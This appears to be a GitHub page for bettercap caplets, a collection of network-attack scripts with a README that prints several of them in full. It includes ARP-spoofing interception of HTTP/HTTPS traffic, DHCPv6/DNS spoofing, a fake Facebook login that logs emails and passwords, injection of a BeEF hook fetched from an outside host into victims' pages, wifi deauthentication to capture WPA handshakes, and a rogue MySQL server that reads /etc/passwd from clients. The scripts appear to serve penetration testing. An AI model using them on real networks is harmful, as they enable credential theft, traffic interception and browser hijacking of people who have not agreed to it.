Bettercap scripts (caplets) and proxy modules.
Switch branches/tags
Nothing to show
Clone or download
Permalink
Failed to load latest commit information.
download-autopwn fix: switched to /usr/local/share/bettercap to keep cross OS compatib… Aug 30, 2018
enumerate using 'caplets' as a default working directory Aug 21, 2018
gitspoof update env syntax Oct 21, 2018
hstshijack fix: allow multiple custom payloads for the same host Oct 24, 2018
jsinject update env syntax Oct 21, 2018
www RTFM caplet that can tell when you did not RTFM added Mar 5, 2018
.gitignore Proof of concept of malicious git redirection Aug 8, 2018
LICENSE.md first commit Feb 22, 2018
Makefile fix: switched to /usr/local/share/bettercap to keep cross OS compatib… Aug 30, 2018
README.md misc: small fix or general refactoring i did not bother commenting Sep 20, 2018
airodump.cap using 'caplets' as a default working directory Aug 21, 2018
ap-config.cap first commit Feb 22, 2018
ap.cap using 'caplets' as a default working directory Aug 21, 2018
beef-active.cap using 'caplets' as a default working directory Aug 21, 2018
beef-inject.js update env syntax Oct 21, 2018
beef-passive.cap using 'caplets' as a default working directory Aug 21, 2018
crypto-miner.cap using 'caplets' as a default working directory Aug 21, 2018
crypto-miner.js update env syntax Oct 21, 2018
download-autopwn.cap using 'caplets' as a default working directory Aug 21, 2018
download-autopwn.js update env syntax Oct 21, 2018
fb-phish.cap using 'caplets' as a default working directory Aug 21, 2018
fb-phish.js Update fb-phish.js Jun 15, 2018
gps.cap new: added a caplet to activate my gps module because my memory is shit Mar 6, 2018
http-req-dump.cap using 'caplets' as a default working directory Aug 21, 2018
http-req-dump.js use request scheme instead of hardcoded 'http' Oct 30, 2018
local-sniffer.cap first commit Feb 22, 2018
login-man-abuse.cap using 'caplets' as a default working directory Aug 21, 2018
login-man-abuse.js fix: switched to /usr/local/share/bettercap to keep cross OS compatib… Aug 30, 2018
login-man-abuser.js first commit Feb 22, 2018
massdeauth.cap massdeauth.cap: deauth every client from every ap every 10 seconds Jul 23, 2018
mitm6.cap Merge pull request #26 from benleb/remove-redundant-word Sep 1, 2018
netmon.cap first commit Feb 22, 2018
pita.cap misc: small fix or general refactoring i did not bother commenting Jul 23, 2018
proxy-script-test.cap using 'caplets' as a default working directory Aug 21, 2018
proxy-script-test.js Update proxy-script-test.js Jun 15, 2018
recon-active.cap first commit Feb 22, 2018
recon-passive.cap first commit Feb 22, 2018
rest-api.cap first commit Feb 22, 2018
rogue-mysql-server.cap new tcp-req-dump.cap caplet file Apr 26, 2018
rtfm.cap using 'caplets' as a default working directory Aug 21, 2018
rtfm.js fix: switched to /usr/local/share/bettercap to keep cross OS compatib… Aug 30, 2018
simple-passwords-sniffer.cap first commit Feb 22, 2018
stsoy.cap using 'caplets' as a default working directory Aug 21, 2018
tcp-req-dump.cap using 'caplets' as a default working directory Aug 21, 2018
tcp-req-dump.js new tcp-req-dump.cap caplet Feb 23, 2018
test-prompt-stats.cap first commit Feb 22, 2018
web-override.cap misc: small fix or general refactoring i did not bother commenting Aug 25, 2018
web-override.js fix: switched to /usr/local/share/bettercap to keep cross OS compatib… Aug 30, 2018
wpa_handshake.cap fix: updated caplets accordingly to 2.2 release changes. Mar 13, 2018

README.md

Caplets

bettercap's interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look at this repo for more.

To install / update the caplets on your computer:

git clone https://github.com/bettercap/caplets.git
cd caplets
sudo make install

http-req-dump.cap

Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dumsp.js proxy script.

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"

# to make it less verbose
# events.stream off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js
clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on

netmon.cap

An example of how to use the ticker module, use this caplet to monitor activities on your network.

net.probe on
clear
ticker on

mitm6.cap

Reroute IPv4 DNS requests by using DHCPv6 replies, start a HTTP server and DNS spoofer for microsoft.com and google.com.

# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear

rest-api.cap

Start a rest API.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on

# enjoy /api/session and /api/events
api.rest on

Get information about the current session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session

Execute a command in the current interactive session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'

Get last 50 events:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/events?n=50

Clear events:

curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events

fb-phish.cap

This caplet will create a fake Facebook login page on port 80, intercept login attempts using the http.proxy, print credentials and redirect the target to the real Facebook.

Make sure to create the folder first:

$ cd www/
$ make
set http.server.address 0.0.0.0
set http.server.path www/www.facebook.com/

set http.proxy.script fb-phish.js

http.proxy on
http.server on

The fb-phish.js proxy script file:

function onRequest(req, res) {
    if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
        var form = req.ParseForm();
        var email = form["email"] || "?", 
            pass  = form["pass"] || "?";

        log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );

        headers = res.Headers.split("\r\n")
        for (var i = 0; i < headers.length; i++) {
            header_name = headers[i].replace(/:.*/, "")
            res.RemoveHeader(header_name)
        }
        res.Status = 301;
        res.SetHeader("Location", "https://www.facebook.com")
        res.SetHeader("Connection", "close")
    }
}

beef-inject.cap

Use a proxy script to inject a BEEF javascript hook:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

The beef.inject.js proxy script file:

function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env('arp.spoof.targets'));
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
        }
    }
}

airodump.cap

Put a wifi interface in monitor mode and listen for frames in order to detect WiF access points and clients.

set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
set ticker.commands clear; wifi.show

# uncomment to only hop on these channels:
# wifi.recon.channel 1,2,3

wifi.recon on
ticker on
events.clear
clear

wpa_handshake.cap

Use various modules to inject wifi frames performing a deauthentication attack, while a sniffer is waiting for WPA handshakes.

# swag prompt for wifi
set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}

# Sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
net.sniff on

# since we need to capture the handshake, we can't hop
# through channels but we need to stick to the one we're
# interested in otherwise the sniffer might lose packets.
wifi.recon.channel 1

wifi.recon on

# uncomment to recon clients of a specific AP given its BSSID
# wifi.recon DE:AD:BE:EF:DE:AD

events.clear
clear

# now just deauth clients and wait ^_^
#
# Example:
#
# wifi.deauth AP-BSSID-HERE
#
# This will deauth every client for this specific access point,
# you can put it as ticker.commands to have the ticker module
# periodically deauth clients :D

rogue-mysql-server.cap

Execute an ARP spoofing attack against a single host and redirect the MySQL traffic to a rogue server. The rogue MySQL server will use the LOCAL INFILE technique to read files from the client.

# set the target for arp spoofing
set arp.spoof.targets 192.168.1.236

# bind rogue mysql server to localhost and
# set the file we want to read
set mysql.server.address 127.0.0.1
set mysql.server.port 3306
set mysql.server.infile /etc/passwd
mysql.server on

# set the ip from the mysql server we want to impersonate
set tcp.address 93.184.216.34
set tcp.port 3306

# set the ip from the rogue mysql server
set tcp.tunnel.address 127.0.0.1
set tcp.tunnel.port 3306

# go ^_^
tcp.proxy on
arp.spoof on

License

bettercap is made with ♥ by the dev team and it's released under the GPL 3 license.